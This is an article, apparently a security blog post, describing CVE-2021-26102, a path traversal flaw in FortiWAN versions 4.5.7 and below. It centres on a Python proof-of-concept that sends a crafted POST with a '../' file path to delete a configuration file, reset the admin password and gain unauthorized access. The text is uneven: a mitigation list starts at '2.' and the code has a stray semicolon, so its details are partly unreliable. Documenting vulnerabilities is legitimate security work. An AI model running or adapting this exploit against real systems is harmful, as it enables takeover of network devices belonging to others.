CVE-2021-26102: FortiWAN Relative Path Traversal Vulnerability Exploitation

In this article, we discuss the details of a relative path traversal vulnerability, designated as CVE-2021-26102, that affects the FortiWAN version 4.5.7 and below, and all versions of 4.4. This vulnerability allows remote non-authenticated attackers to delete files on the system by sending a specifically crafted POST request. Specifically, this vulnerability can be used to delete select configuration files, which consequently resets the admin password to its default value.

System Affected

FortiWAN version 4.5.7 and below, and all versions of 4.4.

Original References

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2021-26102
- CWE-23 Entry: https://cwe.mitre.org/data/definitions/23.html
- FortiWAN Advisory: https://www.fortinet.com/.../fortiwan-security-advisory.html

Exploit Details

The vulnerability exploited in FortiWAN is a relative path traversal vulnerability, otherwise known as CWE-23. An attacker can create a specially crafted POST request, containing harmful '..', '..', '..' characters. Such an attack allows the attacker to manipulate the file system on the target system. Consequently, the attacker can successfully delete important configuration files.

Code Snippet

The following is a POC (proof-of-concept) code snippet that demonstrates the exploit in action using Python's 'requests' library:

import requests

target_url = "https://TARGET_FORTIWAN_IP";
endpoint = "/log_setting/download/"

def send_request(target_url, endpoint, file_path):
    payload = {"LOG_File": file_path}

    try:
        r = requests.post(target_url + endpoint, data=payload)
        print("Request sent.")
    except Exception as e:
        print("Error sending request: {}".format(e))

# Delete the system configuration file that stores the password to reset the admin password to default values.

file_path = "../../../../../../../CONFIGURATION_FILE_PATH"
send_request(target_url, endpoint, file_path)

This Python script sends a specially crafted POST request to the target FortiWAN system's log_setting endpoint. By using the mentioned file path, even though it seems harmless, an attacker can manipulate the file system and delete important files containing the admin password. Consequently, the script will set the admin password to a default value that will give the attacker unauthorized access to the target system.

Regularly update FortiWAN to the latest version, which includes security patches and improvements.

2. Implement strict access control at the network level to prevent unauthorized users from performing such attacks.

Conclusion

Taking CVE-2021-26102 into account, it is critical for organizations and individual users to stay up-to-date with the latest security patches and best practices. As shown in this article, seemingly minor vulnerabilities can offer attackers a foothold in the target system, leading to severe damage or unauthorized access to sensitive information.

Timeline

Published on: 12/19/2024 14:15:05 UTC